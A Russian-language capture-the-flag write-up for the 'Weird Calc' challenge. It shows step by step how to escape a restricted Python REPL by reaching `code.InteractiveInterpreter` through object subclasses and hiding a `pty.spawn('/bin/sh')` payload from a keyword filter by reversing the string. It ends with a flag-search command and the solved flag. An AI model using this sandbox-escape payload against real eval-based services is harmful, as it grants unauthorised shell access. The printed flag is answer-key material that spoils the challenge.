# Weird Calc — Write-up

Подключившись к данному сервису, можем увидеть, что это не что иное, как Python REPL. Скорее всего,
версия "Калькулятора" — версия Python (но нам это не сильно важно). Немного поиграв с консолью,
обнаружим, что все встроенные функции запрещены. И что же делать?

В Python есть несколько конструкторов, которые можно заменить литералами, а именно `dict()` делает
то же, что и `{}`, `list()` — то же, что `[]`, и так далее.
Можем вспомнить, что в Python все объекты являются наследниками класса `object`, значит они
обладают теми же методами. Также можем вспомнить, что получить всех детей любого класса можно
при помощи магического метода `__subclasses__()`. Давайте попробуем посмотреть, что нам это даст:

```python-repl
Calculator 3.9.6 (default, Jul 22 2021, 15:24:21)
[GCC 8.3.0]. Type exit() to exit.
>>> [].__class__.__base__.__subclasses__()
[<class 'type'>, <class 'weakref'>, ..., <class 'code.InteractiveInterpreter'>]
```

Ух ты, у нас есть один интересный класс, `code.InteractiveInterpreter`! Что же мы можем с ним
сделать?

```python-repl
>>> dir([].__class__.__base__.__subclasses__()[-1])
Cannot evaluate because prohibited word 'dir' found in input string 'dir([].__class__.__base__.__subclasses__()[-1])'
```

Ах, да, dir — тоже встроенная функция, которую нельзя использовать. Давайте попробуем локально?

```python-repl
Python 3.9.7 (default, Aug 31 2021, 13:28:12) 
[GCC 11.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from code import InteractiveInterpreter
>>> dir(InteractiveInterpreter)
['__class__', '__delattr__', ..., 'runcode', 'runsource', 'showsyntaxerror', ...]
```

Вау, что-то по-настоящему интересное! Давайте посмотрим, что делает `InteractiveInterpreter.runsource`?

```python-repl
>>> help(InteractiveInterpreter.runsource)
Help on function runsource in module code:

runsource(self, source, filename='<input>', symbol='single')
    Compile and run some source in the interpreter.
    ...
```

Отлично! Но что мы будем выполнять? А давайте просто выполним процесс /bin/sh, дальше сами разберёмся.
Для дальнейших экспериментов сохраним наш найденный полезный класс в переменную.

```python-repl
>>> ii = [].__class__.__base__.__subclasses__()[-1]()
>>> ii.runsource('__import__("pty").spawn("/bin/sh")')
Cannot evaluate because prohibited word '__import__' found in input string 'ii.runsource(\'__import__("pty").spawn("/bin/sh")\')'
```

Кажется, надо как-то избавиться от слова `__import__`. Однако наш payload является строкой, может
быть, просто перевернём её?

```python-repl
>>> '__import__("pty").spawn("/bin/sh")'[::-1]
')"hs/nib/"(nwaps.)"ytp"(__tropmi__'
```

```python-repl
>>> ii.runsource(')"hs/nib/"(nwaps.)"ytp"(__tropmi__'[::-1])
$
```

Ура! Консоль! Сработало! Давайте теперь поищем флаг (буквально).

```python-repl
find / -iname '*flag*' -exec cat {} \; 2>/dev/null | grep UralCTF
```

После этой команды будет выведен **флаг**: `UralCTF{Oh_H3r3_w3_REPL_aga1n}`
